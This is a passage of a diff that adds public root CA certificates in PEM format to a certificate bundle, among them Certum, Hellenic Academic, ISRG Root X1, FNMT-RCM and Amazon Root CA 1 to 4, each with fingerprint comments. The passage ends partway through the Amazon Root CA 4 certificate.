+-----BEGIN CERTIFICATE----- +MIIF0jCCA7qgAwIBAgIQIdbQSk8lD8kyN/yqXhKN6TANBgkqhkiG9w0BAQ0FADCB +gDELMAkGA1UEBhMCUEwxIjAgBgNVBAoTGVVuaXpldG8gVGVjaG5vbG9naWVzIFMu +QS4xJzAlBgNVBAsTHkNlcnR1bSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTEkMCIG +A1UEAxMbQ2VydHVtIFRydXN0ZWQgTmV0d29yayBDQSAyMCIYDzIwMTExMDA2MDgz +OTU2WhgPMjA0NjEwMDYwODM5NTZaMIGAMQswCQYDVQQGEwJQTDEiMCAGA1UEChMZ +VW5pemV0byBUZWNobm9sb2dpZXMgUy5BLjEnMCUGA1UECxMeQ2VydHVtIENlcnRp +ZmljYXRpb24gQXV0aG9yaXR5MSQwIgYDVQQDExtDZXJ0dW0gVHJ1c3RlZCBOZXR3 +b3JrIENBIDIwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQC9+Xj45tWA +DGSdhhuWZGc/IjoedQF97/tcZ4zJzFxrqZHmuULlIEub2pt7uZld2ZuAS9eEQCsn +0+i6MLs+CRqnSZXvK0AkwpfHp+6bJe+oCgCXhVqqndwpyeI1B+twTUrWwbNWuKFB +OJvR+zF/j+Bf4bE/D44WSWDXBo0Y+aomEKsq09DRZ40bRr5HMNUuctHFY9rnY3lE +fktjJImGLjQ/KUxSiyqnwOKRKIm5wFv5HdnnJ63/mgKXwcZQkpsCLL2puTRZCr+E +Sv/f/rOf69me4Jgj7KZrdxYq28ytOxykh9xGc14ZYmhFV+SQgkK7QtbwYeDBoz1m +o130GO6IyY0XRSmZMnUCMe4pJshrAua1YkV/NxVaI2iJ1D7eTiew8EAMvE0Xy02i +sx7QBlrd9pPPV3WZ9fqGGmd4s7+W/jTcvedSVuWz5XV710GRBdxdaeOVDUO5/IOW +OZV7bIBaTxNyxtd9KXpEulKkKtVBRgkg/iKgtlswjbyJDNXXcPiHUv3a76xRLgez +Tv7QCdpw75j6VuZt27VXS9zlLCUVyJ4ueE742pyehizKV/Ma5ciSixqClnrDvFAS +adgOWkaLOusm+iPJtrCBvkIApPjW/jAux9JG9uWOdf3yzLnQh1vMBhBgu4M1t15n +3kfsmUjxpKEV/q2MYo45VU85FrmxY53/twIDAQABo0IwQDAPBgNVHRMBAf8EBTAD +AQH/MB0GA1UdDgQWBBS2oVQ5AsOgP46KvPrU+Bym0ToO/TAOBgNVHQ8BAf8EBAMC +AQYwDQYJKoZIhvcNAQENBQADggIBAHGlDs7k6b8/ONWJWsQCYftMxRQXLYtPU2sQ +F/xlhMcQSZDe28cmk4gmb3DWAl45oPePq5a1pRNcgRRtDoGCERuKTsZPpd1iHkTf +CVn0W3cLN+mLIMb4Ck4uWBzrM9DPhmDJ2vuAL55MYIR4PSFk1vtBHxgP58l1cb29 +XN40hz5BsA72udY/CROWFC/emh1auVbONTqwX3BNXuMp8SMoclm2q8KMZiYcdywm +djWLKKdpoPk79SPdhRB0yZADVpHnr7pH1BKXESLjokmUbOe3lEu6LaTaM4tMpkT/ +WjzGHWTYtTHkpjx6qFcL2+1hGsvxznN3Y6SHb0xRONbkX8eftoEq5IVIeVheO/jb +AoJnwTnbw3RLPTYe+SmTiGhbqEQZIfCn6IENLOiTNrQ3ssqwGyZ6miUfmpqAnksq +P/ujmv5zMnHCnsZy4YpoJ/HkD7TETKVhk/iXEAcqMCWpuchxuO9ozC1+9eB+D4Ko +b7a6bINDd82Kkhehnlt4Fj1F4jNy3eFmypnTycUm/Q1oBEauttmbjL4ZvrHG8hnj +XALKLNhvSgfZyTXaQHXyxKcZb55CEJh15pWLYLztxRLXis7VmFxWlgPF7ncGNf/P +5O4/E2Hu29othfDNrp2yGAlFw5Khchf8R7agCyzxxN5DaAhqXzvwdmP7zAYspsbi +DrW5viSP +-----END CERTIFICATE----- + +# Issuer: CN=Hellenic Academic and Research Institutions RootCA 2015 O=Hellenic Academic and Research Institutions Cert. Authority +# Subject: CN=Hellenic Academic and Research Institutions RootCA 2015 O=Hellenic Academic and Research Institutions Cert. Authority +# Label: "Hellenic Academic and Research Institutions RootCA 2015" +# Serial: 0 +# MD5 Fingerprint: ca:ff:e2:db:03:d9:cb:4b:e9:0f:ad:84:fd:7b:18:ce +# SHA1 Fingerprint: 01:0c:06:95:a6:98:19:14:ff:bf:5f:c6:b0:b6:95:ea:29:e9:12:a6 +# SHA256 Fingerprint: a0:40:92:9a:02:ce:53:b4:ac:f4:f2:ff:c6:98:1c:e4:49:6f:75:5e:6d:45:fe:0b:2a:69:2b:cd:52:52:3f:36 +-----BEGIN CERTIFICATE----- +MIIGCzCCA/OgAwIBAgIBADANBgkqhkiG9w0BAQsFADCBpjELMAkGA1UEBhMCR1Ix +DzANBgNVBAcTBkF0aGVuczFEMEIGA1UEChM7SGVsbGVuaWMgQWNhZGVtaWMgYW5k +IFJlc2VhcmNoIEluc3RpdHV0aW9ucyBDZXJ0LiBBdXRob3JpdHkxQDA+BgNVBAMT +N0hlbGxlbmljIEFjYWRlbWljIGFuZCBSZXNlYXJjaCBJbnN0aXR1dGlvbnMgUm9v +dENBIDIwMTUwHhcNMTUwNzA3MTAxMTIxWhcNNDAwNjMwMTAxMTIxWjCBpjELMAkG +A1UEBhMCR1IxDzANBgNVBAcTBkF0aGVuczFEMEIGA1UEChM7SGVsbGVuaWMgQWNh +ZGVtaWMgYW5kIFJlc2VhcmNoIEluc3RpdHV0aW9ucyBDZXJ0LiBBdXRob3JpdHkx +QDA+BgNVBAMTN0hlbGxlbmljIEFjYWRlbWljIGFuZCBSZXNlYXJjaCBJbnN0aXR1 +dGlvbnMgUm9vdENBIDIwMTUwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoIC +AQDC+Kk/G4n8PDwEXT2QNrCROnk8ZlrvbTkBSRq0t89/TSNTt5AA4xMqKKYx8ZEA +4yjsriFBzh/a/X0SWwGDD7mwX5nh8hKDgE0GPt+sr+ehiGsxr/CL0BgzuNtFajT0 +AoAkKAoCFZVedioNmToUW/bLy1O8E00BiDeUJRtCvCLYjqOWXjrZMts+6PAQZe10 +4S+nfK8nNLspfZu2zwnI5dMK/IhlZXQK3HMcXM1AsRzUtoSMTFDPaI6oWa7CJ06C +ojXdFPQf/7J31Ycvqm59JCfnxssm5uX+Zwdj2EUN3TpZZTlYepKZcj2chF6IIbjV +9Cz82XBST3i4vTwri5WY9bPRaM8gFH5MXF/ni+X1NYEZN9cRCLdmvtNKzoNXADrD +gfgXy5I2XdGj2HUb4Ysn6npIQf1FGQatJ5lOwXBH3bWfgVMS5bGMSF0xQxfjjMZ6 +Y5ZLKTBOhE5iGV48zpeQpX8B653g+IuJ3SWYPZK2fu/Z8VFRfS0myGlZYeCsargq +NhEEelC9MoS+L9xy1dcdFkfkR2YgP/SWxa+OAXqlD3pk9Q0Yh9muiNX6hME6wGko +LfINaFGq46V3xqSQDqE3izEjR8EJCOtu93ib14L8hCCZSRm2Ekax+0VVFqmjZayc +Bw/qa9wfLgZy7IaIEuQt218FL+TwA9MmM+eAws1CoRc0CwIDAQABo0IwQDAPBgNV +HRMBAf8EBTADAQH/MA4GA1UdDwEB/wQEAwIBBjAdBgNVHQ4EFgQUcRVnyMjJvXVd +ctA4GGqd83EkVAswDQYJKoZIhvcNAQELBQADggIBAHW7bVRLqhBYRjTyYtcWNl0I +XtVsyIe9tC5G8jH4fOpCtZMWVdyhDBKg2mF+D1hYc2Ryx+hFjtyp8iY/xnmMsVMI +M4GwVhO+5lFc2JsKT0ucVlMC6U/2DWDqTUJV6HwbISHTGzrMd/K4kPFox/la/vot +9L/J9UUbzjgQKjeKeaO04wlshYaT/4mWJ3iBj2fjRnRUjtkNaeJK9E10A/+yd+2V +Z5fkscWrv2oj6NSU4kQoYsRL4vDY4ilrGnB+JGGTe08DMiUNRSQrlrRGar9KC/ea +j8GsGsVn82800vpzY4zvFrCopEYq+OsS7HK07/grfoxSwIuEVPkvPuNVqNxmsdnh +X9izjFk0WaSrT2y7HxjbdavYy5LNlDhhDgcGH0tGEPEVvo2FXDtKK4F5D7Rpn0lQ +l033DlZdwJVqwjbDG2jJ9SrcR5q+ss7FJej6A7na+RZukYT1HCjI/CbM1xyQVqdf +bzoEvM14iQuODy+jqk+iGxI9FghAD/FGTNeqewjBCvVtJ94Cj8rDtSvK6evIIVM4 +pcw72Hc3MKJP2W/R8kCtQXoXxdZKNYm3QdV8hn9VTYNKpXMgwDqvkPGaJI7ZjnHK +e7iG2rKPmT4dEw0SEe7Uq/DpFXYC5ODfqiAeW2GFZECpkJcNrVPSWh2HagCXZWK0 +vm9qp/UsQu0yrbYhnr68 +-----END CERTIFICATE----- + +# Issuer: CN=Hellenic Academic and Research Institutions ECC RootCA 2015 O=Hellenic Academic and Research Institutions Cert. Authority +# Subject: CN=Hellenic Academic and Research Institutions ECC RootCA 2015 O=Hellenic Academic and Research Institutions Cert. Authority +# Label: "Hellenic Academic and Research Institutions ECC RootCA 2015" +# Serial: 0 +# MD5 Fingerprint: 81:e5:b4:17:eb:c2:f5:e1:4b:0d:41:7b:49:92:fe:ef +# SHA1 Fingerprint: 9f:f1:71:8d:92:d5:9a:f3:7d:74:97:b4:bc:6f:84:68:0b:ba:b6:66 +# SHA256 Fingerprint: 44:b5:45:aa:8a:25:e6:5a:73:ca:15:dc:27:fc:36:d2:4c:1c:b9:95:3a:06:65:39:b1:15:82:dc:48:7b:48:33 +-----BEGIN CERTIFICATE----- +MIICwzCCAkqgAwIBAgIBADAKBggqhkjOPQQDAjCBqjELMAkGA1UEBhMCR1IxDzAN +BgNVBAcTBkF0aGVuczFEMEIGA1UEChM7SGVsbGVuaWMgQWNhZGVtaWMgYW5kIFJl +c2VhcmNoIEluc3RpdHV0aW9ucyBDZXJ0LiBBdXRob3JpdHkxRDBCBgNVBAMTO0hl +bGxlbmljIEFjYWRlbWljIGFuZCBSZXNlYXJjaCBJbnN0aXR1dGlvbnMgRUNDIFJv +b3RDQSAyMDE1MB4XDTE1MDcwNzEwMzcxMloXDTQwMDYzMDEwMzcxMlowgaoxCzAJ +BgNVBAYTAkdSMQ8wDQYDVQQHEwZBdGhlbnMxRDBCBgNVBAoTO0hlbGxlbmljIEFj +YWRlbWljIGFuZCBSZXNlYXJjaCBJbnN0aXR1dGlvbnMgQ2VydC4gQXV0aG9yaXR5 +MUQwQgYDVQQDEztIZWxsZW5pYyBBY2FkZW1pYyBhbmQgUmVzZWFyY2ggSW5zdGl0 +dXRpb25zIEVDQyBSb290Q0EgMjAxNTB2MBAGByqGSM49AgEGBSuBBAAiA2IABJKg +QehLgoRc4vgxEZmGZE4JJS+dQS8KrjVPdJWyUWRrjWvmP3CV8AVER6ZyOFB2lQJa +jq4onvktTpnvLEhvTCUp6NFxW98dwXU3tNf6e3pCnGoKVlp8aQuqgAkkbH7BRqNC +MEAwDwYDVR0TAQH/BAUwAwEB/zAOBgNVHQ8BAf8EBAMCAQYwHQYDVR0OBBYEFLQi +C4KZJAEOnLvkDv2/+5cgk5kqMAoGCCqGSM49BAMCA2cAMGQCMGfOFmI4oqxiRaep +lSTAGiecMjvAwNW6qef4BENThe5SId6d9SWDPp5YSy/XZxMOIQIwBeF1Ad5o7Sof +TUwJCA3sS61kFyjndc5FZXIhF8siQQ6ME5g4mlRtm8rifOoCWCKR +-----END CERTIFICATE----- + +# Issuer: CN=ISRG Root X1 O=Internet Security Research Group +# Subject: CN=ISRG Root X1 O=Internet Security Research Group +# Label: "ISRG Root X1" +# Serial: 172886928669790476064670243504169061120 +# MD5 Fingerprint: 0c:d2:f9:e0:da:17:73:e9:ed:86:4d:a5:e3:70:e7:4e +# SHA1 Fingerprint: ca:bd:2a:79:a1:07:6a:31:f2:1d:25:36:35:cb:03:9d:43:29:a5:e8 +# SHA256 Fingerprint: 96:bc:ec:06:26:49:76:f3:74:60:77:9a:cf:28:c5:a7:cf:e8:a3:c0:aa:e1:1a:8f:fc:ee:05:c0:bd:df:08:c6 +-----BEGIN CERTIFICATE----- +MIIFazCCA1OgAwIBAgIRAIIQz7DSQONZRGPgu2OCiwAwDQYJKoZIhvcNAQELBQAw +TzELMAkGA1UEBhMCVVMxKTAnBgNVBAoTIEludGVybmV0IFNlY3VyaXR5IFJlc2Vh +cmNoIEdyb3VwMRUwEwYDVQQDEwxJU1JHIFJvb3QgWDEwHhcNMTUwNjA0MTEwNDM4 +WhcNMzUwNjA0MTEwNDM4WjBPMQswCQYDVQQGEwJVUzEpMCcGA1UEChMgSW50ZXJu +ZXQgU2VjdXJpdHkgUmVzZWFyY2ggR3JvdXAxFTATBgNVBAMTDElTUkcgUm9vdCBY +MTCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAK3oJHP0FDfzm54rVygc +h77ct984kIxuPOZXoHj3dcKi/vVqbvYATyjb3miGbESTtrFj/RQSa78f0uoxmyF+ +0TM8ukj13Xnfs7j/EvEhmkvBioZxaUpmZmyPfjxwv60pIgbz5MDmgK7iS4+3mX6U +A5/TR5d8mUgjU+g4rk8Kb4Mu0UlXjIB0ttov0DiNewNwIRt18jA8+o+u3dpjq+sW +T8KOEUt+zwvo/7V3LvSye0rgTBIlDHCNAymg4VMk7BPZ7hm/ELNKjD+Jo2FR3qyH +B5T0Y3HsLuJvW5iB4YlcNHlsdu87kGJ55tukmi8mxdAQ4Q7e2RCOFvu396j3x+UC +B5iPNgiV5+I3lg02dZ77DnKxHZu8A/lJBdiB3QW0KtZB6awBdpUKD9jf1b0SHzUv +KBds0pjBqAlkd25HN7rOrFleaJ1/ctaJxQZBKT5ZPt0m9STJEadao0xAH0ahmbWn +OlFuhjuefXKnEgV4We0+UXgVCwOPjdAvBbI+e0ocS3MFEvzG6uBQE3xDk3SzynTn +jh8BCNAw1FtxNrQHusEwMFxIt4I7mKZ9YIqioymCzLq9gwQbooMDQaHWBfEbwrbw +qHyGO0aoSCqI3Haadr8faqU9GY/rOPNk3sgrDQoo//fb4hVC1CLQJ13hef4Y53CI +rU7m2Ys6xt0nUW7/vGT1M0NPAgMBAAGjQjBAMA4GA1UdDwEB/wQEAwIBBjAPBgNV +HRMBAf8EBTADAQH/MB0GA1UdDgQWBBR5tFnme7bl5AFzgAiIyBpY9umbbjANBgkq +hkiG9w0BAQsFAAOCAgEAVR9YqbyyqFDQDLHYGmkgJykIrGF1XIpu+ILlaS/V9lZL +ubhzEFnTIZd+50xx+7LSYK05qAvqFyFWhfFQDlnrzuBZ6brJFe+GnY+EgPbk6ZGQ +3BebYhtF8GaV0nxvwuo77x/Py9auJ/GpsMiu/X1+mvoiBOv/2X/qkSsisRcOj/KK +NFtY2PwByVS5uCbMiogziUwthDyC3+6WVwW6LLv3xLfHTjuCvjHIInNzktHCgKQ5 +ORAzI4JMPJ+GslWYHb4phowim57iaztXOoJwTdwJx4nLCgdNbOhdjsnvzqvHu7Ur +TkXWStAmzOVyyghqpZXjFaH3pO3JLF+l+/+sKAIuvtd7u+Nxe5AW0wdeRlN8NwdC +jNPElpzVmbUq4JUagEiuTDkHzsxHpFKVK7q4+63SM1N95R1NbdWhscdCb+ZAJzVc +oyi3B43njTOQ5yOf+1CceWxG1bQVs5ZufpsMljq4Ui0/1lvh+wjChP4kqKOJ2qxq +4RgqsahDYVvTH9w7jXbyLeiNdd8XM2w9U/t7y0Ff/9yi0GE44Za4rF2LN9d11TPA +mRGunUHBcnWEvgJBQl9nJEiU0Zsnvgc/ubhPgXRR4Xq37Z0j4r7g1SgEEzwxA57d +emyPxgcYxn/eR44/KJ4EBs+lVDR3veyJm+kXQ99b21/+jh5Xos1AnX5iItreGCc= +-----END CERTIFICATE----- + +# Issuer: O=FNMT-RCM OU=AC RAIZ FNMT-RCM +# Subject: O=FNMT-RCM OU=AC RAIZ FNMT-RCM +# Label: "AC RAIZ FNMT-RCM" +# Serial: 485876308206448804701554682760554759 +# MD5 Fingerprint: e2:09:04:b4:d3:bd:d1:a0:14:fd:1a:d2:47:c4:57:1d +# SHA1 Fingerprint: ec:50:35:07:b2:15:c4:95:62:19:e2:a8:9a:5b:42:99:2c:4c:2c:20 +# SHA256 Fingerprint: eb:c5:57:0c:29:01:8c:4d:67:b1:aa:12:7b:af:12:f7:03:b4:61:1e:bc:17:b7:da:b5:57:38:94:17:9b:93:fa +-----BEGIN CERTIFICATE----- +MIIFgzCCA2ugAwIBAgIPXZONMGc2yAYdGsdUhGkHMA0GCSqGSIb3DQEBCwUAMDsx +CzAJBgNVBAYTAkVTMREwDwYDVQQKDAhGTk1ULVJDTTEZMBcGA1UECwwQQUMgUkFJ +WiBGTk1ULVJDTTAeFw0wODEwMjkxNTU5NTZaFw0zMDAxMDEwMDAwMDBaMDsxCzAJ +BgNVBAYTAkVTMREwDwYDVQQKDAhGTk1ULVJDTTEZMBcGA1UECwwQQUMgUkFJWiBG +Tk1ULVJDTTCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBALpxgHpMhm5/ +yBNtwMZ9HACXjywMI7sQmkCpGreHiPibVmr75nuOi5KOpyVdWRHbNi63URcfqQgf +BBckWKo3Shjf5TnUV/3XwSyRAZHiItQDwFj8d0fsjz50Q7qsNI1NOHZnjrDIbzAz +WHFctPVrbtQBULgTfmxKo0nRIBnuvMApGGWn3v7v3QqQIecaZ5JCEJhfTzC8PhxF +tBDXaEAUwED653cXeuYLj2VbPNmaUtu1vZ5Gzz3rkQUCwJaydkxNEJY7kvqcfw+Z +374jNUUeAlz+taibmSXaXvMiwzn15Cou08YfxGyqxRxqAQVKL9LFwag0Jl1mpdIC +IfkYtwb1TplvqKtMUejPUBjFd8g5CSxJkjKZqLsXF3mwWsXmo8RZZUc1g16p6DUL +mbvkzSDGm0oGObVo/CK67lWMK07q87Hj/LaZmtVC+nFNCM+HHmpxffnTtOmlcYF7 +wk5HlqX2doWjKI/pgG6BU6VtX7hI+cL5NqYuSf+4lsKMB7ObiFj86xsc3i1w4peS +MKGJ47xVqCfWS+2QrYv6YyVZLag13cqXM7zlzced0ezvXg5KkAYmY6252TUtB7p2 +ZSysV4999AeU14ECll2jB0nVetBX+RvnU0Z1qrB5QstocQjpYL05ac70r8NWQMet +UqIJ5G+GR4of6ygnXYMgrwTJbFaai0b1AgMBAAGjgYMwgYAwDwYDVR0TAQH/BAUw +AwEB/zAOBgNVHQ8BAf8EBAMCAQYwHQYDVR0OBBYEFPd9xf3E6Jobd2Sn9R2gzL+H +YJptMD4GA1UdIAQ3MDUwMwYEVR0gADArMCkGCCsGAQUFBwIBFh1odHRwOi8vd3d3 +LmNlcnQuZm5tdC5lcy9kcGNzLzANBgkqhkiG9w0BAQsFAAOCAgEAB5BK3/MjTvDD +nFFlm5wioooMhfNzKWtN/gHiqQxjAb8EZ6WdmF/9ARP67Jpi6Yb+tmLSbkyU+8B1 +RXxlDPiyN8+sD8+Nb/kZ94/sHvJwnvDKuO+3/3Y3dlv2bojzr2IyIpMNOmqOFGYM +LVN0V2Ue1bLdI4E7pWYjJ2cJj+F3qkPNZVEI7VFY/uY5+ctHhKQV8Xa7pO6kO8Rf +77IzlhEYt8llvhjho6Tc+hj507wTmzl6NLrTQfv6MooqtyuGC2mDOL7Nii4LcK2N +JpLuHvUBKwrZ1pebbuCoGRw6IYsMHkCtA+fdZn71uSANA+iW+YJF1DngoABd15jm +fZ5nc8OaKveri6E6FO80vFIOiZiaBECEHX5FaZNXzuvO+FB8TxxuBEOb+dY7Ixjp +6o7RTUaN8Tvkasq6+yO3m/qZASlaWFot4/nUbQ4mrcFuNLwy+AwF+mWj2zs3gyLp +1txyM/1d8iC9djwj2ij3+RvrWWTV3F9yfiD8zYm1kGdNYno/Tq0dwzn+evQoFt9B +9kiABdcPUXmsEKvU7ANm5mqwujGSQkBqvjrTcuFqN1W8rB2Vt2lh8kORdOag0wok +RqEIr9baRRmW1FMdW4R58MD3R++Lj8UGrp1MYp3/RgT408m2ECVAdf4WqslKYIYv +uu8wd+RU4riEmViAqhOLUTpPSPaLtrM= +-----END CERTIFICATE----- + +# Issuer: CN=Amazon Root CA 1 O=Amazon +# Subject: CN=Amazon Root CA 1 O=Amazon +# Label: "Amazon Root CA 1" +# Serial: 143266978916655856878034712317230054538369994 +# MD5 Fingerprint: 43:c6:bf:ae:ec:fe:ad:2f:18:c6:88:68:30:fc:c8:e6 +# SHA1 Fingerprint: 8d:a7:f9:65:ec:5e:fc:37:91:0f:1c:6e:59:fd:c1:cc:6a:6e:de:16 +# SHA256 Fingerprint: 8e:cd:e6:88:4f:3d:87:b1:12:5b:a3:1a:c3:fc:b1:3d:70:16:de:7f:57:cc:90:4f:e1:cb:97:c6:ae:98:19:6e +-----BEGIN CERTIFICATE----- +MIIDQTCCAimgAwIBAgITBmyfz5m/jAo54vB4ikPmljZbyjANBgkqhkiG9w0BAQsF +ADA5MQswCQYDVQQGEwJVUzEPMA0GA1UEChMGQW1hem9uMRkwFwYDVQQDExBBbWF6 +b24gUm9vdCBDQSAxMB4XDTE1MDUyNjAwMDAwMFoXDTM4MDExNzAwMDAwMFowOTEL +MAkGA1UEBhMCVVMxDzANBgNVBAoTBkFtYXpvbjEZMBcGA1UEAxMQQW1hem9uIFJv +b3QgQ0EgMTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALJ4gHHKeNXj +ca9HgFB0fW7Y14h29Jlo91ghYPl0hAEvrAIthtOgQ3pOsqTQNroBvo3bSMgHFzZM +9O6II8c+6zf1tRn4SWiw3te5djgdYZ6k/oI2peVKVuRF4fn9tBb6dNqcmzU5L/qw +IFAGbHrQgLKm+a/sRxmPUDgH3KKHOVj4utWp+UhnMJbulHheb4mjUcAwhmahRWa6 +VOujw5H5SNz/0egwLX0tdHA114gk957EWW67c4cX8jJGKLhD+rcdqsq08p8kDi1L +93FcXmn/6pUCyziKrlA4b9v7LWIbxcceVOF34GfID5yHI9Y/QCB/IIDEgEw+OyQm +jgSubJrIqg0CAwEAAaNCMEAwDwYDVR0TAQH/BAUwAwEB/zAOBgNVHQ8BAf8EBAMC +AYYwHQYDVR0OBBYEFIQYzIU07LwMlJQuCFmcx7IQTgoIMA0GCSqGSIb3DQEBCwUA +A4IBAQCY8jdaQZChGsV2USggNiMOruYou6r4lK5IpDB/G/wkjUu0yKGX9rbxenDI +U5PMCCjjmCXPI6T53iHTfIUJrU6adTrCC2qJeHZERxhlbI1Bjjt/msv0tadQ1wUs +N+gDS63pYaACbvXy8MWy7Vu33PqUXHeeE6V/Uq2V8viTO96LXFvKWlJbYK8U90vv +o/ufQJVtMVT8QtPHRh8jrdkPSHCa2XV4cdFyQzR1bldZwgJcJmApzyMZFo6IQ6XU +5MsI+yMRQ+hDKXJioaldXgjUkK642M4UwtBV8ob2xJNDd2ZhwLnoQdeXeGADbkpy +rqXRfboQnoZsG4q5WTP468SQvvG5 +-----END CERTIFICATE----- + +# Issuer: CN=Amazon Root CA 2 O=Amazon +# Subject: CN=Amazon Root CA 2 O=Amazon +# Label: "Amazon Root CA 2" +# Serial: 143266982885963551818349160658925006970653239 +# MD5 Fingerprint: c8:e5:8d:ce:a8:42:e2:7a:c0:2a:5c:7c:9e:26:bf:66 +# SHA1 Fingerprint: 5a:8c:ef:45:d7:a6:98:59:76:7a:8c:8b:44:96:b5:78:cf:47:4b:1a +# SHA256 Fingerprint: 1b:a5:b2:aa:8c:65:40:1a:82:96:01:18:f8:0b:ec:4f:62:30:4d:83:ce:c4:71:3a:19:c3:9c:01:1e:a4:6d:b4 +-----BEGIN CERTIFICATE----- +MIIFQTCCAymgAwIBAgITBmyf0pY1hp8KD+WGePhbJruKNzANBgkqhkiG9w0BAQwF +ADA5MQswCQYDVQQGEwJVUzEPMA0GA1UEChMGQW1hem9uMRkwFwYDVQQDExBBbWF6 +b24gUm9vdCBDQSAyMB4XDTE1MDUyNjAwMDAwMFoXDTQwMDUyNjAwMDAwMFowOTEL +MAkGA1UEBhMCVVMxDzANBgNVBAoTBkFtYXpvbjEZMBcGA1UEAxMQQW1hem9uIFJv +b3QgQ0EgMjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAK2Wny2cSkxK +gXlRmeyKy2tgURO8TW0G/LAIjd0ZEGrHJgw12MBvIITplLGbhQPDW9tK6Mj4kHbZ +W0/jTOgGNk3Mmqw9DJArktQGGWCsN0R5hYGCrVo34A3MnaZMUnbqQ523BNFQ9lXg +1dKmSYXpN+nKfq5clU1Imj+uIFptiJXZNLhSGkOQsL9sBbm2eLfq0OQ6PBJTYv9K +8nu+NQWpEjTj82R0Yiw9AElaKP4yRLuH3WUnAnE72kr3H9rN9yFVkE8P7K6C4Z9r +2UXTu/Bfh+08LDmG2j/e7HJV63mjrdvdfLC6HM783k81ds8P+HgfajZRRidhW+me +z/CiVX18JYpvL7TFz4QuK/0NURBs+18bvBt+xa47mAExkv8LV/SasrlX6avvDXbR +8O70zoan4G7ptGmh32n2M8ZpLpcTnqWHsFcQgTfJU7O7f/aS0ZzQGPSSbtqDT6Zj +mUyl+17vIWR6IF9sZIUVyzfpYgwLKhbcAS4y2j5L9Z469hdAlO+ekQiG+r5jqFoz +7Mt0Q5X5bGlSNscpb/xVA1wf+5+9R+vnSUeVC06JIglJ4PVhHvG/LopyboBZ/1c6 ++XUyo05f7O0oYtlNc/LMgRdg7c3r3NunysV+Ar3yVAhU/bQtCSwXVEqY0VThUWcI +0u1ufm8/0i2BWSlmy5A5lREedCf+3euvAgMBAAGjQjBAMA8GA1UdEwEB/wQFMAMB +Af8wDgYDVR0PAQH/BAQDAgGGMB0GA1UdDgQWBBSwDPBMMPQFWAJI/TPlUq9LhONm +UjANBgkqhkiG9w0BAQwFAAOCAgEAqqiAjw54o+Ci1M3m9Zh6O+oAA7CXDpO8Wqj2 +LIxyh6mx/H9z/WNxeKWHWc8w4Q0QshNabYL1auaAn6AFC2jkR2vHat+2/XcycuUY ++gn0oJMsXdKMdYV2ZZAMA3m3MSNjrXiDCYZohMr/+c8mmpJ5581LxedhpxfL86kS +k5Nrp+gvU5LEYFiwzAJRGFuFjWJZY7attN6a+yb3ACfAXVU3dJnJUH/jWS5E4ywl +7uxMMne0nxrpS10gxdr9HIcWxkPo1LsmmkVwXqkLN1PiRnsn/eBG8om3zEK2yygm +btmlyTrIQRNg91CMFa6ybRoVGld45pIq2WWQgj9sAq+uEjonljYE1x2igGOpm/Hl +urR8FLBOybEfdF849lHqm/osohHUqS0nGkWxr7JOcQ3AWEbWaQbLU8uz/mtBzUF+ +fUwPfHJ5elnNXkoOrJupmHN5fLT0zLm4BwyydFy4x2+IoZCn9Kr5v2c69BoVYh63 +n749sSmvZ6ES8lgQGVMDMBu4Gon2nL2XA46jCfMdiyHxtN/kHNGfZQIG6lzWE7OE +76KlXIx3KadowGuuQNKotOrN8I1LOJwZmhsoVLiJkO/KdYE+HvJkJMcYr07/R54H +9jVlpNMKVv/1F2Rs76giJUmTtt8AF9pYfl3uxRuw0dFfIRDH+fO6AgonB8Xx1sfT +4PsJYGw= +-----END CERTIFICATE----- + +# Issuer: CN=Amazon Root CA 3 O=Amazon +# Subject: CN=Amazon Root CA 3 O=Amazon +# Label: "Amazon Root CA 3" +# Serial: 143266986699090766294700635381230934788665930 +# MD5 Fingerprint: a0:d4:ef:0b:f7:b5:d8:49:95:2a:ec:f5:c4:fc:81:87 +# SHA1 Fingerprint: 0d:44:dd:8c:3c:8c:1a:1a:58:75:64:81:e9:0f:2e:2a:ff:b3:d2:6e +# SHA256 Fingerprint: 18:ce:6c:fe:7b:f1:4e:60:b2:e3:47:b8:df:e8:68:cb:31:d0:2e:bb:3a:da:27:15:69:f5:03:43:b4:6d:b3:a4 +-----BEGIN CERTIFICATE----- +MIIBtjCCAVugAwIBAgITBmyf1XSXNmY/Owua2eiedgPySjAKBggqhkjOPQQDAjA5 +MQswCQYDVQQGEwJVUzEPMA0GA1UEChMGQW1hem9uMRkwFwYDVQQDExBBbWF6b24g +Um9vdCBDQSAzMB4XDTE1MDUyNjAwMDAwMFoXDTQwMDUyNjAwMDAwMFowOTELMAkG +A1UEBhMCVVMxDzANBgNVBAoTBkFtYXpvbjEZMBcGA1UEAxMQQW1hem9uIFJvb3Qg +Q0EgMzBZMBMGByqGSM49AgEGCCqGSM49AwEHA0IABCmXp8ZBf8ANm+gBG1bG8lKl +ui2yEujSLtf6ycXYqm0fc4E7O5hrOXwzpcVOho6AF2hiRVd9RFgdszflZwjrZt6j +QjBAMA8GA1UdEwEB/wQFMAMBAf8wDgYDVR0PAQH/BAQDAgGGMB0GA1UdDgQWBBSr +ttvXBp43rDCGB5Fwx5zEGbF4wDAKBggqhkjOPQQDAgNJADBGAiEA4IWSoxe3jfkr +BqWTrBqYaGFy+uGh0PsceGCmQ5nFuMQCIQCcAu/xlJyzlvnrxir4tiz+OpAUFteM +YyRIHN8wfdVoOw== +-----END CERTIFICATE----- + +# Issuer: CN=Amazon Root CA 4 O=Amazon +# Subject: CN=Amazon Root CA 4 O=Amazon +# Label: "Amazon Root CA 4" +# Serial: 143266989758080763974105200630763877849284878 +# MD5 Fingerprint: 89:bc:27:d5:eb:17:8d:06:6a:69:d5:fd:89:47:b4:cd +# SHA1 Fingerprint: f6:10:84:07:d6:f8:bb:67:98:0c:c2:e2:44:c2:eb:ae:1c:ef:63:be +# SHA256 Fingerprint: e3:5d:28:41:9e:d0:20:25:cf:a6:90:38:cd:62:39:62:45:8d:a5:c6:95:fb:de:a3:c2:2b:0b:fb:25:89:70:92 +-----BEGIN CERTIFICATE----- +MIIB8jCCAXigAwIBAgITBmyf18G7EEwpQ+Vxe3ssyBrBDjAKBggqhkjOPQQDAzA5 